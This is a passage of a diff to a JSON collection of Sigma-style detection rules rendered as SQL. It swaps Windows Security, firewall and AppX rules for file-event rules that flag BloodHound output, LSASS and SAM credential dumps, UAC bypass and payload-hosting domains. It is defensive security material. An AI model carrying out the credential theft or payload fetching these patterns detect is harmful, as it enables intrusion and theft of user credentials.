'%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Some false positives may arise in some environment and this may require some tuning. Add addional filters or reduce level depending on the level of noise" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "SCM Database Privileged Operation", - "id": "dae8171c-5ec6-4396-b210-8466585b53e9", - "status": "test", - "description": "Detects non-system users performing privileged operation os the SCM database", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "status": "experimental", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" - ], - "filename": "win_security_scm_database_privileged_operation.yml" - }, - { - "title": "Failed Logon From Public IP", - "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", - "status": "test", - "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", - "author": "NVISO", - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.t1078", - "attack.t1190", - "attack.t1133" - ], - "falsepositives": [ - "Legitimate logon attempts over the internet", - "IPv4-to-IPv6 mapped IPs" - ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_susp_failed_logon_source.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "Device Installation Blocked", - "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects an installation of a device that is forbidden by the system policy", - "author": "frack113", - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" - ], - "filename": "win_security_device_installation_blocked.yml" - }, - { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_lsass_dump.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "title": "ScreenConnect Temporary Installation Artefact", + "id": "fec96f39-988b-4586-b746-b93d59fd1922", "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\'" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_screenconnect_artefact.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Writing Local Admin Share", + "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", + "status": "experimental", + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.lateral_movement", + "attack.t1546.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_writing_local_admin_share.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_terminalservices_rdp_ngrok.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "New Firewall Rule Added In Windows Firewall Exception List", - "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", "status": "experimental", - "description": "Detects when a rule has been added to the Windows Firewall exception list", - "author": "frack113", - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2004' AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], - "filename": "win_firewall_as_add_rule.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", - "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", - "status": "experimental", - "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", - "author": "frack113", + "title": "Startup Folder File Write", + "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", + "status": "test", + "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "falsepositives": [ + "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2006' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" ], - "filename": "win_firewall_as_delete_rule.yml" + "filename": "file_event_win_startup_folder_file_write.yml" }, { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "status": "test", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1105" + ], + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_lsass_werfault_dump.yml" }, { - "title": "Deployment Of The AppX Package Was Blocked By The Policy", - "id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by the local computer policy", - "author": "frack113", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Rare cases of administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('441', '442', '453', '454'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_policy_block.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Suspicious AppX Package Installation Attempt", - "id": "898d5fc9-fbc3-43de-93ad-38e97237c344", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Detects an appx package installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements and could be suspicious", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Legitimate AppX packages not signed by MS used part of an enterprise" + "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '401' AND ErrorCode = '0x80073cff')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_appx_package_installation.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Deployment AppX Package Was Blocked By AppLocker", - "id": "6ae53108-c3a0-4bee-8f45-c7591a2c337f", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects an appx package deployment that was blocked by AppLocker policy", - "author": "frack113", - "tags": [ - "attack.defense_evasion" - ], + "description": "Detects windows executables that writes files with suspicious extensions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '412')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_appxdeployment_server_applocker_block.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "Potential Malicious AppX Package Installation Attempts", - "id": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", - "status": "experimental", - "description": "Detects potential installation or installation attempts of known malicious appx packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "status": "test", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID IN ('400', '401') AND PackageFullName LIKE '%3669e262-ec02-4e9d-bcb4-3d008b4afac9%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE 